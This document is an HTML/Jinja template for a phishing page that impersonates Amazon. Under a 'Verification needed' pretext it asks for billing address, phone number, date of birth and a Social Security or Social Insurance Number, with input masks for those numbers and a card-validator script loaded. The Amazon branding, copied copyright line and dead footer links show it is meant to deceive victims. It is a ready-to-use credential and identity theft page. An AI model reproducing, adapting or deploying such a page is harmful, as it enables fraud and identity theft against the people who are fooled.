<html>
  <head>
    <title>Amazon - Update Info</title>
    <link rel="icon" href="../static/img/favicon.ico" />
    <link rel="stylesheet" href="../static/css/mobile_login.css" />
    <link rel="stylesheet" href="../static/css/billing.css" />
    <link rel="stylesheet" href="../static/css/main.pc.css" />
    <meta charset="utf-8" />
    <meta
      content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"
      name="viewport" />
  </head>
  <body>
    <center>
      <br />
      <header style="background-color: #fff">
        <div class="hleft">
          <i
            class="a-icon a-icon-logo"
            style="background-position: -5px -130px; height: 31px; width: 103px"
            role="img"
            aria-label="Amazon"></i>
        </div>
      </header>
    </center>
    <center>
      <br />
      <div style="width: 400px" class="boxlogin">
        <div
          id="warnings"
          style="font-size: 12px; font-family: Arial, sans-serif">
          <h1>Verification needed</h1>
          <span style="font-size: 15px; font-family: Arial, sans-serif"
            >Please enter your billing address to verify your account.</span
          >
          <br />
          <br /><br />
        </div>
        <form action="#" method="post" name="details" id="details">
          <div id="formbilling">
            <h3>Billing Address</h3>
            <div
              class="a-input-text-group a-spacing-medium a-spacing-top-micro">
              <div
                style="
                  border-top-color: #949494;
                  background: #e7e9ec;
                  border-radius: 5px;
                  border-color: #adb1b8 #a2a6ac #8d9096;
                  border-style: solid;
                  border-width: 1px;
                  cursor: pointer;
                  display: inline-block;
                  padding: 2px;
                  width: 100%;
                  text-align: center;
                  text-decoration: none !important;
                  vertical-align: middle;
                "
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <select
                  name="country"
                  style="
                    background-color: transparent;
                    border: 0;
                    display: block;
                    font-size: 1rem;
                    line-height: 1.4;
                    margin: 0;
                    outline: 0;
                    padding: 1.2rem 1.6rem 1.2rem 1.7rem;
                    text-align: center;
                    padding: 10px;
                    width: 99.7%;
                    border-style: none;
                  "
                  required="required">
                  <option value="Canada">{{ cn }}</option>
                  <option value="Afghanistan">Afghanistan</option>
                  <option value="Albania">Albania</option>
                  <option value="Algeria">Algeria</option>
                  <option value="American Samoa">American Samoa</option>
                  <option value="Andorra">Andorra</option>
                  <option value="Angola">Angola</option>
                  <option value="Anguilla">Anguilla</option>
                  <option value="Antarctica">Antarctica</option>
                  <option value="Antigua and Barbuda">
                    Antigua and Barbuda
                  </option>
                  <option value="Argentina">Argentina</option>
                  <option value="Armenia">Armenia</option>
                  <option value="Aruba">Aruba</option>
                  <option value="Australia">Australia</option>
                  <option value="Austria">Austria</option>
                  <option value="Azerbaijan">Azerbaijan</option>
                  <option value="Bahamas">Bahamas</option>
                  <option value="Bahrain">Bahrain</option>
                  <option value="Bangladesh">Bangladesh</option>
                  <option value="Barbados">Barbados</option>
                  <option value="Belarus">Belarus</option>
                  <option value="Belgium">Belgium</option>
                  <option value="Belize">Belize</option>
                  <option value="Benin">Benin</option>
                  <option value="Bermuda">Bermuda</option>
                  <option value="Bhutan">Bhutan</option>
                  <option value="Bolivia">Bolivia</option>
                  <option value="Bosnia and Herzegovina">
                    Bosnia and Herzegovina
                  </option>
                  <option value="Botswana">Botswana</option>
                  <option value="Bouvet Island">Bouvet Island</option>
                  <option value="Brazil">Brazil</option>
                  <option value="British Indian Ocean Territory">
                    British Indian Ocean Territory
                  </option>
                  <option value="Brunei Darussalam">Brunei Darussalam</option>
                  <option value="Bulgaria">Bulgaria</option>
                  <option value="Burkina Faso">Burkina Faso</option>
                  <option value="Burundi">Burundi</option>
                  <option value="Cambodia">Cambodia</option>
                  <option value="Cameroon">Cameroon</option>
                  <option value="Canada">Canada</option>
                  <option value="Cape Verde">Cape Verde</option>
                  <option value="Cayman Islands">Cayman Islands</option>
                  <option value="Central African Republic">
                    Central African Republic
                  </option>
                  <option value="Chad">Chad</option>
                  <option value="Chile">Chile</option>
                  <option value="China">China</option>
                  <option value="Christmas Island">Christmas Island</option>
                  <option value="Cocos (Keeling) Islands">
                    Cocos (Keeling) Islands
                  </option>
                  <option value="Colombia">Colombia</option>
                  <option value="Comoros">Comoros</option>
                  <option value="Congo">Congo</option>
                  <option value="Congo, The Democratic Republic of The">
                    Congo, The Democratic Republic of The
                  </option>
                  <option value="Cook Islands">Cook Islands</option>
                  <option value="Costa Rica">Costa Rica</option>
                  <option value="Cote D'ivoire">Cote D'ivoire</option>
                  <option value="Croatia">Croatia</option>
                  <option value="Cuba">Cuba</option>
                  <option value="Cyprus">Cyprus</option>
                  <option value="Czech Republic">Czech Republic</option>
                  <option value="Denmark">Denmark</option>
                  <option value="Djibouti">Djibouti</option>
                  <option value="Dominica">Dominica</option>
                  <option value="Dominican Republic">Dominican Republic</option>
                  <option value="Ecuador">Ecuador</option>
                  <option value="Egypt">Egypt</option>
                  <option value="El Salvador">El Salvador</option>
                  <option value="Equatorial Guinea">Equatorial Guinea</option>
                  <option value="Eritrea">Eritrea</option>
                  <option value="Estonia">Estonia</option>
                  <option value="Ethiopia">Ethiopia</option>
                  <option value="Falkland Islands (Malvinas)">
                    Falkland Islands (Malvinas)
                  </option>
                  <option value="Faroe Islands">Faroe Islands</option>
                  <option value="Fiji">Fiji</option>
                  <option value="Finland">Finland</option>
                  <option value="France">France</option>
                  <option value="French Guiana">French Guiana</option>
                  <option value="French Polynesia">French Polynesia</option>
                  <option value="French Southern Territories">
                    French Southern Territories
                  </option>
                  <option value="Gabon">Gabon</option>
                  <option value="Gambia">Gambia</option>
                  <option value="Georgia">Georgia</option>
                  <option value="Germany">Germany</option>
                  <option value="Ghana">Ghana</option>
                  <option value="Gibraltar">Gibraltar</option>
                  <option value="Greece">Greece</option>
                  <option value="Greenland">Greenland</option>
                  <option value="Grenada">Grenada</option>
                  <option value="Guadeloupe">Guadeloupe</option>
                  <option value="Guam">Guam</option>
                  <option value="Guatemala">Guatemala</option>
                  <option value="Guinea">Guinea</option>
                  <option value="Guinea-bissau">Guinea-bissau</option>
                  <option value="Guyana">Guyana</option>
                  <option value="Haiti">Haiti</option>
                  <option value="Heard Island and Mcdonald Islands">
                    Heard Island and Mcdonald Islands
                  </option>
                  <option value="Holy See (Vatican City State)">
                    Holy See (Vatican City State)
                  </option>
                  <option value="Honduras">Honduras</option>
                  <option value="Hong Kong">Hong Kong</option>
                  <option value="Hungary">Hungary</option>
                  <option value="Iceland">Iceland</option>
                  <option value="India">India</option>
                  <option value="Indonesia">Indonesia</option>
                  <option value="Iran, Islamic Republic of">
                    Iran, Islamic Republic of
                  </option>
                  <option value="Iraq">Iraq</option>
                  <option value="Ireland">Ireland</option>
                  <option value="Israel">Israel</option>
                  <option value="Italy">Italy</option>
                  <option value="Jamaica">Jamaica</option>
                  <option value="Japan">Japan</option>
                  <option value="Jordan">Jordan</option>
                  <option value="Kazakhstan">Kazakhstan</option>
                  <option value="Kenya">Kenya</option>
                  <option value="Kiribati">Kiribati</option>
                  <option value="Korea, Democratic People's Republic of">
                    Korea, Democratic People's Republic of
                  </option>
                  <option value="Korea, Republic of">Korea, Republic of</option>
                  <option value="Kuwait">Kuwait</option>
                  <option value="Kyrgyzstan">Kyrgyzstan</option>
                  <option value="Lao People's Democratic Republic">
                    Lao People's Democratic Republic
                  </option>
                  <option value="Latvia">Latvia</option>
                  <option value="Lebanon">Lebanon</option>
                  <option value="Lesotho">Lesotho</option>
                  <option value="Liberia">Liberia</option>
                  <option value="Libyan Arab Jamahiriya">
                    Libyan Arab Jamahiriya
                  </option>
                  <option value="Liechtenstein">Liechtenstein</option>
                  <option value="Lithuania">Lithuania</option>
                  <option value="Luxembourg">Luxembourg</option>
                  <option value="Macao">Macao</option>
                  <option value="Macedonia, The Former Yugoslav Republic of">
                    Macedonia, The Former Yugoslav Republic of
                  </option>
                  <option value="Madagascar">Madagascar</option>
                  <option value="Malawi">Malawi</option>
                  <option value="Malaysia">Malaysia</option>
                  <option value="Maldives">Maldives</option>
                  <option value="Mali">Mali</option>
                  <option value="Malta">Malta</option>
                  <option value="Marshall Islands">Marshall Islands</option>
                  <option value="Martinique">Martinique</option>
                  <option value="Mauritania">Mauritania</option>
                  <option value="Mauritius">Mauritius</option>
                  <option value="Mayotte">Mayotte</option>
                  <option value="Mexico">Mexico</option>
                  <option value="Micronesia, Federated States of">
                    Micronesia, Federated States of
                  </option>
                  <option value="Moldova, Republic of">
                    Moldova, Republic of
                  </option>
                  <option value="Monaco">Monaco</option>
                  <option value="Mongolia">Mongolia</option>
                  <option value="Montserrat">Montserrat</option>
                  <option value="Morocco">Morocco</option>
                  <option value="Mozambique">Mozambique</option>
                  <option value="Myanmar">Myanmar</option>
                  <option value="Namibia">Namibia</option>
                  <option value="Nauru">Nauru</option>
                  <option value="Nepal">Nepal</option>
                  <option value="Netherlands">Netherlands</option>
                  <option value="Netherlands Antilles">
                    Netherlands Antilles
                  </option>
                  <option value="New Caledonia">New Caledonia</option>
                  <option value="New Zealand">New Zealand</option>
                  <option value="Nicaragua">Nicaragua</option>
                  <option value="Niger">Niger</option>
                  <option value="Nigeria">Nigeria</option>
                  <option value="Niue">Niue</option>
                  <option value="Norfolk Island">Norfolk Island</option>
                  <option value="Northern Mariana Islands">
                    Northern Mariana Islands
                  </option>
                  <option value="Norway">Norway</option>
                  <option value="Oman">Oman</option>
                  <option value="Pakistan">Pakistan</option>
                  <option value="Palau">Palau</option>
                  <option value="Palestinian Territory, Occupied">
                    Palestinian Territory, Occupied
                  </option>
                  <option value="Panama">Panama</option>
                  <option value="Papua New Guinea">Papua New Guinea</option>
                  <option value="Paraguay">Paraguay</option>
                  <option value="Peru">Peru</option>
                  <option value="Philippines">Philippines</option>
                  <option value="Pitcairn">Pitcairn</option>
                  <option value="Poland">Poland</option>
                  <option value="Portugal">Portugal</option>
                  <option value="Puerto Rico">Puerto Rico</option>
                  <option value="Qatar">Qatar</option>
                  <option value="Reunion">Reunion</option>
                  <option value="Romania">Romania</option>
                  <option value="Russian Federation">Russian Federation</option>
                  <option value="Rwanda">Rwanda</option>
                  <option value="Saint Helena">Saint Helena</option>
                  <option value="Saint Kitts and Nevis">
                    Saint Kitts and Nevis
                  </option>
                  <option value="Saint Lucia">Saint Lucia</option>
                  <option value="Saint Pierre and Miquelon">
                    Saint Pierre and Miquelon
                  </option>
                  <option value="Saint Vincent and The Grenadines">
                    Saint Vincent and The Grenadines
                  </option>
                  <option value="Samoa">Samoa</option>
                  <option value="San Marino">San Marino</option>
                  <option value="Sao Tome and Principe">
                    Sao Tome and Principe
                  </option>
                  <option value="Saudi Arabia">Saudi Arabia</option>
                  <option value="Senegal">Senegal</option>
                  <option value="Serbia and Montenegro">
                    Serbia and Montenegro
                  </option>
                  <option value="Seychelles">Seychelles</option>
                  <option value="Sierra Leone">Sierra Leone</option>
                  <option value="Singapore">Singapore</option>
                  <option value="Slovakia">Slovakia</option>
                  <option value="Slovenia">Slovenia</option>
                  <option value="Solomon Islands">Solomon Islands</option>
                  <option value="Somalia">Somalia</option>
                  <option value="South Africa">South Africa</option>
                  <option value="South Georgia and The South Sandwich Islands">
                    South Georgia and The South Sandwich Islands
                  </option>
                  <option value="Spain">Spain</option>
                  <option value="Sri Lanka">Sri Lanka</option>
                  <option value="Sudan">Sudan</option>
                  <option value="Suriname">Suriname</option>
                  <option value="Svalbard and Jan Mayen">
                    Svalbard and Jan Mayen
                  </option>
                  <option value="Swaziland">Swaziland</option>
                  <option value="Sweden">Sweden</option>
                  <option value="Switzerland">Switzerland</option>
                  <option value="Syrian Arab Republic">
                    Syrian Arab Republic
                  </option>
                  <option value="Taiwan, Province of China">
                    Taiwan, Province of China
                  </option>
                  <option value="Tajikistan">Tajikistan</option>
                  <option value="Tanzania, United Republic of">
                    Tanzania, United Republic of
                  </option>
                  <option value="Thailand">Thailand</option>
                  <option value="Timor-leste">Timor-leste</option>
                  <option value="Togo">Togo</option>
                  <option value="Tokelau">Tokelau</option>
                  <option value="Tonga">Tonga</option>
                  <option value="Trinidad and Tobago">
                    Trinidad and Tobago
                  </option>
                  <option value="Tunisia">Tunisia</option>
                  <option value="Turkey">Turkey</option>
                  <option value="Turkmenistan">Turkmenistan</option>
                  <option value="Turks and Caicos Islands">
                    Turks and Caicos Islands
                  </option>
                  <option value="Tuvalu">Tuvalu</option>
                  <option value="Uganda">Uganda</option>
                  <option value="Ukraine">Ukraine</option>
                  <option value="United Arab Emirates">
                    United Arab Emirates
                  </option>
                  <option value="United States">United States</option>
                  <option value="United Kingdom">United Kingdom</option>
                  <option value="United States Minor Outlying Islands">
                    United States Minor Outlying Islands
                  </option>
                  <option value="Uruguay">Uruguay</option>
                  <option value="Uzbekistan">Uzbekistan</option>
                  <option value="Vanuatu">Vanuatu</option>
                  <option value="Venezuela">Venezuela</option>
                  <option value="Viet Nam">Viet Nam</option>
                  <option value="Virgin Islands, British">
                    Virgin Islands, British
                  </option>
                  <option value="Virgin Islands, U.S.">
                    Virgin Islands, U.S.
                  </option>
                  <option value="Wallis and Futuna">Wallis and Futuna</option>
                  <option value="Western Sahara">Western Sahara</option>
                  <option value="Yemen">Yemen</option>
                  <option value="Zambia">Zambia</option>
                  <option value="Zimbabwe">Zimbabwe</option>
                </select>
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="Full Name"
                  name="fullname"
                  id="fullname"
                  autocorrect="off"
                  autocapitalize="off"
                  required="required" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="Address Line"
                  name="address"
                  id="address"
                  autocorrect="off"
                  autocapitalize="off"
                  required="required" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="City"
                  name="city"
                  autocorrect="off"
                  id="city"
                  autocapitalize="off"
                  required="required" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="State / Province / Region"
                  name="state"
                  id="state"
                  autocorrect="off"
                  autocapitalize="off" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="Zip Code"
                  name="zipcode"
                  autocorrect="off"
                  id="zipcode"
                  autocapitalize="off"
                  required="required" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="tel"
                  placeholder="Phone Number"
                  name="phone"
                  autocorrect="off"
                  id="phone"
                  autocapitalize="off"
                  required="required" />
              </div>
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="text"
                  placeholder="Date of Birth"
                  name="dob"
                  autocorrect="off"
                  id="dob"
                  autocapitalize="off"
                  required="required" />
              </div>
              {% if 'United States' in cn %}
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="tel"
                  placeholder="Social Security Number"
                  name="ssn"
                  id="ssn"
                  autocorrect="off"
                  autocapitalize="off"
                  required="required" />
              </div>
              {% elif 'Canada' in cn %}
              <div
                style="padding: 5px"
                class="a-input-text-wrapper auth-required-field auth-fill-claim">
                <input
                  type="tel"
                  placeholder="Social Insurance Number"
                  name="sin"
                  id="sin"
                  autocorrect="off"
                  autocapitalize="off"
                  required="required" />
              </div>
              {% else %} {{ super() }} {% endif %}
              <br />
              <input
                type="submit"
                id="submit_cc"
                class="button a-button-text"
                style="
                  padding: 10px;
                  font-size: 15px;
                  background: linear-gradient(to bottom, #f7dfa5, #f0c14b);
                "
                value="Update" />
            </div>
          </div>
        </form>
      </div>
    </center>

    <div id="right-2"></div>
    <div class="a-section a-spacing-top-extra-large auth-footer">
      <div class="a-divider a-divider-section">
        <div class="a-divider-inner"></div>
      </div>
      <div class="a-section a-spacing-small a-text-center a-size-mini">
        <span class="auth-footer-seperator"></span>
        <a
          class="a-link-normal"
          target="_blank"
          rel="noopener"
          href="javascript void(0)">
          Conditions of Use
        </a>
        <span class="auth-footer-seperator"></span>
        <a
          class="a-link-normal"
          target="_blank"
          rel="noopener"
          href="javascript void(0)">
          Privacy Notice
        </a>
        <span class="auth-footer-seperator"></span>
        <a
          class="a-link-normal"
          target="_blank"
          rel="noopener"
          href="javascript void(0)">
          Help
        </a>
        <span class="auth-footer-seperator"></span>
      </div>
      <div class="a-section a-spacing-none a-text-center">
        <span class="a-size-mini a-color-secondary">
          © 1996-2023, Amazon.com, Inc. or its affiliates
        </span>
      </div>
      <br />
    </div>
    {{ url_for('static',filename='js/jquery.masked.js') }}
    <script src="{{ url_for('static',filename='js/jquery.js') }}"></script>
    <script src="{{ url_for('static',filename='js/jquery.masked.js') }}"></script>
    <script src="../static/js/jquery-3.3.1.min.js"></script>
    <script src="../static/js/jquery.mask.min.js"></script>
    <script src="../static/js/jquery.validate.min.js"></script>
    <script src="../static/js/additional-methods.min.js"></script>
    <script src="../static/js/jquery.creditCardValidator.js"></script>
    <script>
      $(document).ready(function () {
        $("#ssn").mask("999-99-9999");
        $("#sin").mask("999-999-999");
        $('input[name="phone"]').keyup(function (e) {
          if (/\D/g.test(this.value)) {
            this.value = this.value.replace(/\D/g, "");
          }
        });
        $("#dob").mask("QW-SR-R000", {
          translation: {
            Q: {pattern: /[0-3]/, optional: false},
            W: {pattern: /[0-9]/, optional: false},
            S: {pattern: /[0-1]/, optional: false},
            R: {pattern: /[1-2]/, optional: false},
          },
        });
      });
    </script>
    <script type="text/javascript">
      $(document).ready(function (e) {
        $("#details").validate({
          errorClass: "error-class",
          rules: {
            address: {
              required: true,
              minlength: 5,
            },
            city: {
              required: true,
              minlength: 2,
              maxlength: 30,
            },
            state: {
              required: true,
              minlength: 2,
              maxlength: 30,
            },
            zipcode: {
              required: true,
              minlength: 2,
              maxlength: 12,
            },
            phone: {
              required: true,
              minlength: 3,
              maxlength: 17,
            },
            dob: {
              required: true,
              minlength: 2,
              maxlength: 10,
            },
          },
          messages: {
            address: {
              required: "Please enter a address.",
            },
            city: {
              required: "Please enter a City name.",
            },
            state: {
              required: "Please enter a State, Region or Province.",
            },
            zipcode: {
              required: "Please enter a zip code",
            },
            phone: {
              required: "Please enter a phone number",
            },
            dob: {
              required: "Please enter a date of birth",
            },
          },
        });
      });
    </script>
  </body>
</html>
